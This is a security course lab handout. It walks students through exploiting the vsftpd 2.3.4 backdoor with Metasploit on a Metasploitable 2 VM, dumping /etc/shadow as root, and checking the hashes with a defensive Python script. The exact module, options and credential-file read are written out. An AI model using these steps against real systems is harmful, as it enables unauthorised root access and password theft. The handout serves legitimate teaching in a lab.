Lab 09 - Metasploit Framework
Introduction
In this lab you will use the Metasploit Framework (MSF), a framework for developing and running code that exploits vulnerabilities. These exploits can carry different payloads. A payload is the code that actually runs on the target system once the exploit succeeds, such as creating a reverse shell or setting up a remotely accessible server. As new exploit code is developed for newly discovered vulnerabilities, it is packaged as a module (plug-in) and added to the framework's repository.
Lab Goals
After completing this lab, you will be able to
- Use the Metasploit Framework to exploit a given vulnerability
Specifically, you will use MSF to exploit the vsftpd 2.3.4 backdoor vulnerability. This vulnerability lets an attacker remotely execute code on the target without restriction, which can give the attacker the "keys to the kingdom": the password hashes, which can later be cracked and used to gain full access to the system and the network. Here are the steps at a glance:
- Log on to both the Kali and Metasploitable 2 PCs.
- Configure Metasploit.
- Run the exploit.
- Log off from both the Kali and Metasploitable 2 PCs.
Setup
You should have the Kali and Metasploitable 2 machines installed.
Lab Steps
Step 1: Log on to both the Kali and Metasploitable 2 PCs.
Step 2: Configure Metasploit.
- Click the Terminal icon.
- In the Terminal window, type msfconsole and press ENTER. Note: the Metasploit console may take a few minutes to start up.
- At the msf prompt, type help and press ENTER. This displays the commands that can be used in the Metasploit console.
- What command displays modules of a given type?
- What command allows you to assign a value to a variable?
- What command selects a module by name?
In the Metasploit console, type search vsftpd and press ENTER. You should see the exploit for the vsftpd vulnerability listed in the results.
- What is the exact name of the exploit?
In the Metasploit console, type use exploit/unix/ftp/vsftpd_234_backdoor and press ENTER. The Metasploit console will display a new prompt with the name of the exploit in red. If that does not happen, you may have typed or pasted the command incorrectly.
Type show options and press ENTER. Note that you will need to set the remote host (RHOST), which is the IP address of the target machine; in this case, that is Metasploitable. You will also set the remote port (RPORT), which is port 21 for FTP, and the local host (LHOST), which is the IP address of the Kali machine and is not listed among the options.
At the command prompt, do the following:
- Type set RHOST 192.168.1.X, where X is the correct IP address of your Metasploitable machine, and press ENTER.
- Type set RPORT 21 and press ENTER.
- Type set LHOST 192.168.1.Y, where Y is your Kali IP address, and press ENTER.
Next you will select the payload to deliver. Exploits can have different payloads. To see what payloads are available for this exploit, do the following:
- Type show payloads and press ENTER. There is only one payload available, and it is labeled cmd/unix/interact. This will allow you to interact with the remote machine without having to log in.
- In the Metasploit console, type set PAYLOAD cmd/unix/interact and press ENTER. The payload is now selected and the module is fully configured.
Step 3: Run the exploit.
You are now ready to run the exploit. In the Metasploit console, type exploit and press ENTER. If it worked properly, you will see the following:
- [+] Backdoor service has been spawned, handling…
- [+] uid=0(root) gid=0(root) -
This means you have a back door into Metasploitable, and you are in as the root user. Let's type a few commands and see what we can do.
At the prompt, type whoami and press ENTER.
- Who are you?
At the prompt, type pwd and press ENTER.
- Where are you in the directory structure of Metasploitable?
Let's grab some password hashes so that we can try to crack passwords in a later lab.
- Type cat /etc/shadow and press ENTER.
- With your mouse, highlight all of the text, right-click, and select Copy.
- Right-click the desktop and select Create New Text Document | Empty Document.
- Name the document MetaHashes.txt and press ENTER.
- Right-click the text document and select Open With | Leafpad.
- Paste the text into the text document.
- Close the document and save the changes.
We have successfully connected to the machine via a back door and exfiltrated the hashes for cracking passwords. You can do just about anything with and to this machine: you might add users, delete files, clear logs, and so on. For now, what we have will do, so log out.
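Before the cracking lab, it is worth understanding what you actually copied. The following Python script is an added example written for this handout (it is not part of the original lab or of Metasploit): it parses lines in /etc/shadow format and reports, for each account, whether it is locked, has an empty password field, or uses a weak hash algorithm, which is the same audit an administrator would run to decide which accounts need a stronger hash or should be locked. The shadow lines embedded in it are constructed placeholders, not real Metasploitable hashes.

```python
import re
from dataclasses import dataclass

# Constructed sample in /etc/shadow format. The hash strings are placeholders that
# follow the $id$salt$hash layout; they are not real Metasploitable 2 hashes.
SAMPLE_SHADOW = """\
root:$1$abcdefgh$ABCDEFGHIJKLMNOPQRSTUV:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:!:14684:0:99999:7:::
msfadmin:$1$ijklmnop$WXYZABCDEFGHIJKLMNOPQR:14747:0:99999:7:::
user:$6$saltsalt$LONGSHA512HASHPLACEHOLDER:14747:0:99999:7:::
guest::14747:0:99999:7:::
"""

# crypt(3) identifier -> (algorithm name, considered weak against offline cracking)
ALGORITHMS = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "7": ("scrypt", False),
    "y": ("yescrypt", False),
}

@dataclass
class ShadowEntry:
    user: str
    status: str   # "locked", "empty", or the hash algorithm name
    weak: bool    # True when a password login is possible and the hash is cheap to crack

def classify(field: str) -> tuple[str, bool]:
    """Classify the second (password) field of one shadow line."""
    if field == "":
        return "empty", True            # no password at all: login without a password
    if field.startswith(("*", "!")):
        return "locked", False          # not a valid hash: password login disabled
    m = re.match(r"^\$([^$]+)\$", field)
    if m is None:
        return "descrypt", True         # legacy 13-character DES hash, no $id$ prefix
    return ALGORITHMS.get(m.group(1), ("unknown", True))

def audit_shadow(text: str) -> list[ShadowEntry]:
    """Parse shadow-format text into one ShadowEntry per account line."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:             # blank or malformed line
            continue
        status, weak = classify(fields[1])
        entries.append(ShadowEntry(fields[0], status, weak))
    return entries

def at_risk(text: str) -> list[str]:
    """Accounts an administrator should lock or migrate to a stronger hash."""
    return [e.user for e in audit_shadow(text) if e.weak]
```

Running at_risk on the MetaHashes.txt you saved tells you which accounts are exposed to offline cracking, which is exactly the set a defender would prioritise for remediation.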
Show Me
These steps are pretty easy, and you should be able to show them to me in just a minute. Create a video that contains the following:
- Show the MSF setup and exploit to the point of getting a command prompt.
- Show that you can retrieve the shadow file by showing its contents.